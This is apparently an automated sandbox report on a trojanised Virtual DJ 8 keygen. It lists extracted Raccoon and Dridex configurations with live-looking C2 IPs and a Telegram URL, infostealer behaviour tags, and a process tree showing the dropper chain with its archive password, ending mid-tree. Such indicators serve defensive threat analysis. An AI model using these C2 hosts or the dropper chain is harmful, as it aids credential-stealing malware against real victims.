Analysis

  • max time kernel
    1776s
  • max time network
    1746s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-04-2021 16:41

General

Malware Config

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2388
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:360
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef7406e00,0x7fef7406e10,0x7fef7406e20
        2⤵
          PID:1988
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1108 /prefetch:2
          2⤵
            PID:1336
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1180 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1516
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 /prefetch:8
            2⤵
              PID:1772
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
              2⤵
                PID:568
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
                2⤵
                  PID:516
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:1
                  2⤵
                    PID:836
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:1
                    2⤵
                      PID:1632
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:1
                      2⤵
                        PID:316
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:1
                        2⤵
                          PID:652
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3284 /prefetch:8
                          2⤵
                            PID:2272
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3364 /prefetch:2
                            2⤵
                              PID:2480
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:8
                              2⤵
                                PID:2680
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
                                2⤵
                                  PID:2740
                                • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                                  2⤵
                                    PID:2760
                                    • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                      "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f467740,0x13f467750,0x13f467760
                                      3⤵
                                        PID:2776
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
                                      2⤵
                                        PID:2856
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
                                        2⤵
                                          PID:2912
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:8
                                          2⤵
                                            PID:2968
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2288
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:8
                                            2⤵
                                              PID:2332
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
                                              2⤵
                                                PID:1216
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:8
                                                2⤵
                                                  PID:2620
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:8
                                                  2⤵
                                                    PID:1948
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
                                                    2⤵
                                                      PID:2724
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:8
                                                      2⤵
                                                        PID:1808
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4116 /prefetch:8
                                                        2⤵
                                                          PID:2052
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4032 /prefetch:8
                                                          2⤵
                                                            PID:576
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4436 /prefetch:8
                                                            2⤵
                                                              PID:2176
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3248 /prefetch:8
                                                              2⤵
                                                                PID:2156
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4436 /prefetch:8
                                                                2⤵
                                                                  PID:2752
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
                                                                  2⤵
                                                                    PID:2872
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:8
                                                                    2⤵
                                                                      PID:2932
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
                                                                      2⤵
                                                                        PID:2760
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4228 /prefetch:8
                                                                        2⤵
                                                                          PID:2916
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
                                                                          2⤵
                                                                            PID:3008
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                            2⤵
                                                                              PID:908
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4076 /prefetch:8
                                                                              2⤵
                                                                                PID:2276
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
                                                                                2⤵
                                                                                  PID:2476
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:8
                                                                                  2⤵
                                                                                    PID:1336
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4008 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2212
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2700
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4244 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1604
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4036 /prefetch:8
                                                                                          2⤵
                                                                                            PID:616
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1
                                                                                            2⤵
                                                                                              PID:980
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1136
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:576
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:836
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2744
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3804 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2900
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1432 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2848
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:2792
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:2980
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3628 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:2968
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3588 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:524
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:2472
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=884 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:1292
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2816 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:2000
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2928 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1604
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4072 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:2160
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=536 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:2864
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1076,4279802419431390907,200135752968597559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:2928
                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x1ac
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2184
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Virtual_dj_8_keygen.zip\Virtual_dj_8_keygen.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Virtual_dj_8_keygen.zip\Virtual_dj_8_keygen.exe"
                                                                                                                      1⤵
                                                                                                                        PID:2276
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:2516
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                            keygen-pr.exe -p83fsase3Ge
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:1996
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
